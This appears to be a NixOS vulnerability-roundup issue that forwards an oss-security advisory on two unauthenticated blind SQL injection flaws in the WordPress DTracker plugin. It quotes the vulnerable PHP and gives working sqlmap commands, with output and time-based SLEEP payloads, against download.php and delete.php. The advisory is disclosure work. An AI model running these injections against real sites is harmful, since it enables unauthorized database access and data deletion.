Roundup: [oss-security] Multiple Blind SQL injection vulnerability in Wordpress Plugin DTracker v1.5

[grahamc]

Here is a report from the oss-security mailing list for Vulnerability Roundup 27.

Skip to First Email

Instructions:

Identification

Identify if we have the software, in 16.09, 17.03, and unstable. Then determine if we are vulnerable, and make a comment with your findings. It can also be helpful to specify if you think there is a patch, or if it can be fixed via a general update.

Example:

unstable: we are not vulnerable (link to the package)
17.03: we are vulnerable (link to the package)
16.09: we don't have it packaged

IMPORTANT: If you believe there are possibly related issues, bring them up on the parent issue!

Patching

Start by commenting on this issue saying you're working on a patch. This way, we don't duplicate work.

If you open a pull request, tag this issue and the master issue for the roundup.

If you commit the patch directly to a branch, please leave a comment on this issue with the branch and the commit hash, example:

fixed:

release-16.09: abc123

Skip to First Email

Upon Completion ...

• [ ] Update Graham's database

Info

Triage Indicator:

-needs-triage +roundup27 thread:00000000000040e2

• File Search: https://search.nix.gsc.io/?q=wordpress&i=fosho&repos=nixos-nixpkgs
• GitHub Search: https://github.com/NixOS/nixpkgs/search?utf8=%E2%9C%93&q=wordpress+in%3Apath&type=Code

Should the search term be changed from wordpress? Suggest a new package search by commenting:

-suggested:wordpress +suggested:correctPackageName thread:00000000000040e2

Known CVEs: CVE-2017-1002004, CVE-2017-1002005

---

Skip to End

Thu, 09 Mar 2017 07:57:13 -0500 "Larry W. Cashdollar" , C3D0A2F5-941D-4030-9910-57C3E46053E1@me.com

Title: Multiple Blind SQL injection vulnerability in Wordpress Plugin DTracker v1.5
Author: Larry W. Cashdollar, @_larry0
Date: 2017-03-08
CVE-IDs: CVE-2017-1002004 CVE-2017-1002005
Download Site: https://wordpress.org/plugins/dtracker/
Vendor: https://profiles.wordpress.org/dijo/
Vendor Notified: 2017-03-08
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=183
Description: Track the details of the users downloading the pdf files from wordpress site.
Vulnerability:
CVE-2017-1002004:
In file ./dtracker/download.php user input isn't sanitized via the id variable before adding it to the end of an SQL query.

$doc_id         = $_GET['id'];
$file = $wpdb->get_results( "SELECT * FROM wp_posts WHERE ID = $doc_id " );

The user does not need to be authenticated to the Wordpress installation to exploit this vulnerability.

CVE-2017-1002005:
In file ./dtracker/delete.php user input isn't sanitized via the contact_id variable before adding it to the end of an SQL query.

$contact_id     = $_POST['contact_id']; //Contact ID to be deleted

$query  = "DELETE FROM wp_contacts WHERE id = $contact_id";
$wpdb->query($query); // Delete the contact

The user does not need to be authenticated to the Wordpress installation to exploit this vulnerability.

Exploit Code:
    • $ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/download.php?id=*'  --dbms mysql  --level 3 --risk 3
    • URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
    • sqlmap identified the following injection point(s) with a total of 1410 HTTP(s) requests:
    • ---
    • Parameter: #1* (URI)
    •     Type: AND/OR time-based blind
    •     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    •     Payload: http://192.168.0.169:80/wordpress/wp-content/plugins/dtracker/download.php?id=(CASE WHEN (7148=7148) THEN SLEEP(5) ELSE 7148 END)
    • ---
    • [10:14:09] [INFO] the back-end DBMS is MySQL
    • web server operating system: Linux Ubuntu 16.04 (xenial)
    • web application technology: Apache 2.4.18
    • back-end DBMS: MySQL >= 5.0.12
    • [10:14:09] [WARNING] HTTP error codes detected during run:
    • 404 (Not Found) - 14 times
    • [10:14:09] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

    • $ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/delete.php' --data 'contact_id=*'  --dbms mysql --risk 1 --level 3
    •  
    • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
    • sqlmap identified the following injection point(s) with a total of 831 HTTP(s) requests:
    • ---
    • Parameter: #1* ((custom) POST)
    •     Type: AND/OR time-based blind
    •     Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    •     Payload: contact_id=(SELECT * FROM (SELECT(SLEEP(5)))Vtrh)
    • ---
    • [11:53:27] [INFO] the back-end DBMS is MySQL
    • web server operating system: Linux Ubuntu 16.04 (xenial)
    • web application technology: Apache 2.4.18
    • back-end DBMS: MySQL >= 5.0.12
    • [11:53:27] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

Skip to End

---

[fpletz]

We don't package wordpress plugins.